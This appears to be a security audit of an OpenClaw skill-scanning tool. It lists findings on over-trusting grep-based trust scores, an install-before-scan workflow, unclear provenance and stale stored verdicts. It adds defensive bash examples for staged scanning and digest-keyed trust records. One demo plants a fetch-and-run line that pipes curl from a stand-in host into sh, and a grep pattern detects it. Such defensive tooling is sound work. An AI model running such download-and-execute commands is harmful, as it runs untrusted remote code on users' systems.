Skill Security Scanner
Review
Audited by ClawScan on May 10, 2026.
Overview
The skill does not show exfiltration or destructive code, but its scan workflow and trust scores can create unwarranted confidence in other skills; review it before relying on it.
This appears to be a low-impact local helper rather than malware, but do not treat its trust score as proof that another skill is safe. Scan untrusted skills from a sandboxed or downloaded copy before installing them, and manually review all files, install steps, permissions, and provenance.
Findings (5)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
A malicious or risky skill could receive an overly reassuring score, causing a user or agent to trust it more than warranted.
The script derives its safety verdict from grep checks of the target's SKILL.md, a file the skill author controls, and even treats a substring of the skill's path as evidence that it is an official skill; on that basis it can tell the user the skill is safe to use.
SKILL_FILE="$SKILL_PATH/SKILL.md"
...
GREEN_FLAGS+=("Official OpenClaw skill")
...
echo " Safe to use - well documented, standard permissions"
Treat results as a rough heuristic only. Do not rely on the trust score alone; review the full manifest, all code files, install steps, permissions, and provenance in a sandbox before installation.
Users may add an untrusted skill to their OpenClaw environment before reviewing it, which undermines the scanner’s stated safety purpose.
The documented workflow is labelled as scanning before installation, but its first command installs the untrusted skill into the live skills directory, and the scan only runs on that installed copy afterwards.
# Scan before installing from ClawHub
clawhub install cool-new-skill
./scripts/scan-skill.sh ~/.openclaw/skills/cool-new-skill
Use a download-only, temporary, or sandboxed copy for scanning before installing or enabling the skill in the active agent environment.
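The workflow above, reordered so that the scan runs against a staged copy and nothing reaches the live skills directory until the scan and a human review have passed. This is an added example written for this review; it is not code from the audited skill or from ClawScan. It assumes the candidate has already been fetched to a local directory (a git clone or an unpacked download), that the scanner is invoked as a command taking the directory as its only argument and signals problems with a non-zero exit status (a hypothetical interface), and it uses a constructed demo scanner and demo skill rather than the real scan-skill.sh.

```shell
#!/bin/bash
# Added example, not part of the audited skill. Stage, scan, then promote.
# Assumed scanner interface: "$SCANNER <dir>", non-zero exit means flagged.
set -u

# Copy the candidate into a fresh temp directory and strip execute bits from
# every file, so nothing in the copy can be run by accident (by the user or an
# agent) while it is being inspected. Prints the staged path.
stage_for_review() {
  local src="$1" stage
  stage=$(mktemp -d) || return 1
  cp -R "$src"/. "$stage"/ || return 1
  find "$stage" -type f -exec chmod a-x {} +
  printf '%s\n' "$stage"
}

# Files a reviewer should read first: shell scripts, install specs, SKILL.md.
list_review_targets() {
  find "$1" -type f \( -name '*.sh' -o -name 'install*' -o -name 'SKILL.md' \) | LC_ALL=C sort
}

# Copy the reviewed staged copy into the live skills directory. Refuses to
# overwrite an already-installed skill of the same name.
promote_reviewed() {
  local stage="$1" name="$2" skills_dir="$3" dest
  dest="$skills_dir/$name"
  [ -e "$dest" ] && { echo "refusing: $dest already exists" >&2; return 1; }
  mkdir -p "$skills_dir" && cp -R "$stage"/. "$dest"/
}

# End to end: stage, scan the staged copy, and only then promote. The scanner
# never sees the live skills directory, so a failed scan leaves it untouched;
# the staged copy is kept for manual review in that case.
scan_then_install() {
  local src="$1" name="$2" skills_dir="$3" scanner="$4" stage
  stage=$(stage_for_review "$src") || return 1
  if ! "$scanner" "$stage"; then
    echo "scan flagged $name; staged copy kept at $stage for manual review" >&2
    return 1
  fi
  promote_reviewed "$stage" "$name" "$skills_dir" && rm -rf "$stage"
}

# Constructed demo scanner (stand-in for scan-skill.sh): flags any file that
# pipes a download straight into a shell.
demo_scanner() {
  ! grep -rEq 'curl[^|]*[|][[:space:]]*(ba)?sh' "$1"
}

# Constructed demo: one clean skill, then the same skill with a flagged line.
demo() {
  local src skills
  src=$(mktemp -d); skills=$(mktemp -d)
  printf '# demo skill\n' > "$src/SKILL.md"
  printf 'echo hello\n' > "$src/setup.sh"; chmod +x "$src/setup.sh"
  scan_then_install "$src" "cool-new-skill" "$skills" demo_scanner && echo "installed clean skill"
  printf 'curl https://example.invalid/x | sh\n' >> "$src/setup.sh"
  scan_then_install "$src" "cool-new-skill-2" "$skills" demo_scanner || echo "blocked: not installed"
  rm -rf "$src" "$skills"
}
demo
```

Run the real scanner in place of demo_scanner only from its own reviewed checkout, and read the output of list_review_targets before promoting anything; a scan that passes is still only a heuristic.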
This is expected for a local scanner, but it still means the user is running shell code from the skill package.
The skill includes a user-invoked shell helper that runs local grep-based checks against a user-provided path.
#!/bin/bash
SKILL_PATH="$1"
...
grep -qE ... "$SKILL_FILE"
Inspect the script before running it and invoke it only on intended local skill directories.
Users have less provenance information to confirm that the package matches the intended upstream project.
The registry metadata does not provide a verified source or homepage, while the README separately references a GitHub repository.
Source: unknown
Homepage: none
Verify the package source, owner, and checksums or repository history before trusting updates.
Stored trust scores can become stale or be over-trusted in future decisions.
The skill recommends persisting scan reports and trust scores for later reuse.
Save to .learnings/ for documentation
...
Use memory - Remember trust scores for known skills
Store scan results with dates and evidence, and re-scan or manually review before using old trust decisions.
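An added example for the first finding (a green flag taken from the path) and this one (stored trust scores); it is not the skill's code and not ClawScan's. It shows an "official" flag that comes from a pinned allowlist of content digests instead of from the path, and stored verdicts that carry the date, the digest they were made against and the evidence, and that are refused once the content changes or the record is older than a limit. The substring test in official_by_path is an assumed reconstruction of the weak check the audit describes (the page shows only the flag text it sets); the record format, the 30-day limit, the allowlist file and the demo skill are constructed, and sha256sum from coreutils is assumed to be available.

```shell
#!/bin/bash
# Added example, not part of the audited skill. Digest-keyed trust records and
# an allowlist-based "official" flag. Record format and 30-day limit assumed.
set -u

MAX_AGE_DAYS=30

# Digest of every file path and content under a skill directory; renaming,
# adding or editing any file changes it.
skill_digest() {
  local dir="$1"
  ( cd "$dir" || exit 1
    find . -type f | LC_ALL=C sort | while IFS= read -r f; do
      sha256sum "$f"
    done | sha256sum | cut -d' ' -f1 )
}

# Weak check, as the audit describes it: a string the publisher chose for the
# directory name is taken as evidence. Assumed reconstruction, not the skill's code.
official_by_path() {
  case "$1" in *openclaw*) return 0 ;; *) return 1 ;; esac
}

# Stronger check: the directory's digest must appear in a pinned allowlist
# (one digest per line, maintained out of band by whoever vouches for the skill).
official_by_allowlist() {
  local dir="$1" allowlist="$2"
  grep -qxF "$(skill_digest "$dir")" "$allowlist"
}

# Append a record: epoch seconds, digest, skill name, verdict, evidence.
# An explicit timestamp may be passed (used to show how staleness is handled).
record_verdict() {
  local dir="$1" verdict="$2" evidence="$3" db="$4" ts="${5:-$(date +%s)}"
  printf '%s\t%s\t%s\t%s\t%s\n' "$ts" "$(skill_digest "$dir")" "$(basename "$dir")" \
    "$verdict" "$evidence" >> "$db"
}

# Reuse a stored verdict only if its digest still matches the directory and it
# is younger than MAX_AGE_DAYS; otherwise print RESCAN with the reason and fail.
cached_verdict() {
  local dir="$1" db="$2" now line ts rec_digest
  now=$(date +%s)
  [ -f "$db" ] || { echo "RESCAN no-record"; return 1; }
  line=$(awk -F'\t' -v n="$(basename "$dir")" '$3 == n' "$db" | tail -n 1)
  [ -n "$line" ] || { echo "RESCAN no-record"; return 1; }
  ts=$(printf '%s\n' "$line" | cut -f1)
  rec_digest=$(printf '%s\n' "$line" | cut -f2)
  [ "$rec_digest" = "$(skill_digest "$dir")" ] || { echo "RESCAN content-changed"; return 1; }
  [ $(( (now - ts) / 86400 )) -lt "$MAX_AGE_DAYS" ] || { echo "RESCAN stale"; return 1; }
  printf '%s\n' "$line" | cut -f4
}

# Constructed demo: a skill whose directory name happens to contain "openclaw".
demo() {
  local db allow skill
  db=$(mktemp); allow=$(mktemp); skill=$(mktemp -d)/openclaw-demo
  mkdir -p "$skill"; printf '# demo\n' > "$skill/SKILL.md"
  official_by_path "$skill" && echo "path heuristic: official (name chosen by the publisher)"
  official_by_allowlist "$skill" "$allow" || echo "allowlist: not official (digest not pinned)"
  record_verdict "$skill" safe "manual review of SKILL.md, no install step" "$db"
  cached_verdict "$skill" "$db"
  printf 'install: ./setup.sh\n' >> "$skill/SKILL.md"
  cached_verdict "$skill" "$db"
  rm -rf "$db" "$allow" "$(dirname "$skill")"
}
demo
```

Any RESCAN result means the old decision is not reused: the skill is scanned and reviewed again and a fresh dated record is written. The evidence field must not contain tabs, since the record is tab-separated.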
